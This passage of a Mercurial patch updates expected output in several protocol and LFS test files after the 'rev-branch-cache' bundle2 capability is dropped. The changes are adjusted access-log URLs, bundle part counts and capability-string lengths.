seconds (200) (glob) bundle2-input-bundle: no-transaction bundle2-input-part: "reply:changegroup" (advisory) (params: 0 advisory) supported diff --git a/tests/test-lfs-serve-access.t b/tests/test-lfs-serve-access.t --- a/tests/test-lfs-serve-access.t +++ b/tests/test-lfs-serve-access.t @@ -66,7 +66,7 @@ $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 400 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 400 - (glob) $ rm -f 
$TESTTMP/access.log $TESTTMP/errors.log @@ -110,9 +110,7 @@ bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 39 - bundle2-input-bundle: 4 parts total + bundle2-input-bundle: 3 parts total checking for updated bookmarks updating the branch cache added 1 changesets with 1 changes to 1 files @@ -167,7 +165,7 @@ $LOCALIP - - [$LOGDATE$] "POST /missing/objects/batch HTTP/1.1" 404 - (glob) $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=getbundle HTTP/1.1" 200 - 
x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /subdir/mount/point/.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point/.hg/lfs/objects/f03217a32529a28a42d03b1244fe09b6e0f9fd06d7b966d4d50567be2abe6c0e HTTP/1.1" 200 - (glob) @@ -313,7 +311,7 @@ $ cat $TESTTMP/access.log $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - 
x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D392c05922088bacf8e68a6939b480017afbf245d x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) @@ -332,7 +330,7 @@ $LOCALIP - - [$LOGDATE$] "PUT /.hg/lfs/objects/b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c HTTP/1.1" 422 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D392c05922088bacf8e68a6939b480017afbf245d x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=525251863cad618e55d483555f3d00a2ca99597e&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 
comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=525251863cad618e55d483555f3d00a2ca99597e&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /.hg/lfs/objects/276f73cfd75f9fb519810df5f5d96d6594ca2521abd86cbcd92122f7d51a1f3d HTTP/1.1" 500 - (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) @@ -483,7 +481,7 @@ $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 401 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 
comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 401 - (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /.hg/lfs/objects/276f73cfd75f9fb519810df5f5d96d6594ca2521abd86cbcd92122f7d51a1f3d HTTP/1.1" 200 - (glob) diff --git a/tests/test-obsolete-changeset-exchange.t b/tests/test-obsolete-changeset-exchange.t --- a/tests/test-obsolete-changeset-exchange.t +++ b/tests/test-obsolete-changeset-exchange.t @@ -158,11 +158,10 @@ list of changesets: bec0734cd68e84477ba7fc1d13e6cff53ab70129 listing keys for "bookmarks" - bundle2-output-bundle: "HG20", 4 parts total + bundle2-output-bundle: "HG20", 3 parts total bundle2-output-part: "changegroup" (params: 1 mandatory 1 advisory) streamed payload bundle2-output-part: "listkeys" (params: 1 mandatory) empty payload bundle2-output-part: "phase-heads" 24 bytes payload - bundle2-output-part: "cache:rev-branch-cache" (advisory) streamed payload bundle2-input-bundle: with-transaction bundle2-input-part: "changegroup" (params: 1 mandatory 1 advisory) supported adding changesets @@ -174,9 +173,7 @@ bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 - 
bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 39 - bundle2-input-bundle: 4 parts total + bundle2-input-bundle: 3 parts total checking for updated bookmarks updating the branch cache added 1 changesets with 1 changes to 1 files (+1 heads) diff --git a/tests/test-obsolete-distributed.t b/tests/test-obsolete-distributed.t --- a/tests/test-obsolete-distributed.t +++ b/tests/test-obsolete-distributed.t @@ -151,12 +151,11 @@ list of changesets: 391a2bf12b1b8b05a72400ae36b26d50a091dc22 listing keys for "bookmarks" - bundle2-output-bundle: "HG20", 5 parts total + bundle2-output-bundle: "HG20", 4 parts total bundle2-output-part: "changegroup" (params: 1 mandatory 1 advisory) streamed payload bundle2-output-part: "listkeys" (params: 1 mandatory) empty payload bundle2-output-part: "obsmarkers" streamed payload bundle2-output-part: "phase-heads" 48 bytes payload - bundle2-output-part: "cache:rev-branch-cache" (advisory) streamed payload bundle2-input-bundle: with-transaction bundle2-input-part: "changegroup" (params: 1 mandatory 1 advisory) supported adding changesets @@ -170,9 +169,7 @@ bundle2-input-part: total payload size 143 bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 48 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 39 - bundle2-input-bundle: 5 parts total + bundle2-input-bundle: 4 parts total checking for updated bookmarks adding 1 changesets with 1 changes to 1 files (+1 heads) 1 new obsolescence markers diff --git a/tests/test-ssh-bundle1.t b/tests/test-ssh-bundle1.t --- a/tests/test-ssh-bundle1.t +++ b/tests/test-ssh-bundle1.t @@ -482,7 +482,7 @@ sending upgrade request: * proto=exp-ssh-v2-0003 (glob) (sshv2 !) sending hello command sending between command - remote: 463 (sshv1 !) + remote: 444 (sshv1 !) protocol upgraded to exp-ssh-v2-0003 (sshv2 !) 
remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 (sshv1 !) diff --git a/tests/test-ssh-proto-unbundle.t b/tests/test-ssh-proto-unbundle.t --- a/tests/test-ssh-proto-unbundle.t +++ b/tests/test-ssh-proto-unbundle.t @@ -56,8 +56,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -109,8 +109,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -235,8 +235,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -293,8 +293,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> 
read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -359,8 +359,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -418,8 +418,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -485,8 +485,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 
1\n @@ -543,8 +543,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -609,8 +609,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -668,8 +668,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -735,8 +735,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps 
pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -796,8 +796,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -865,8 +865,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -923,8 +923,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -989,8 +989,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> 
readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1050,8 +1050,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1119,8 +1119,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1180,8 +1180,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1255,8 +1255,8 @@ i> 
0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1314,8 +1314,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1382,8 +1382,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1441,8 +1441,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey 
streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1511,8 +1511,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1572,8 +1572,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1650,8 +1650,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap 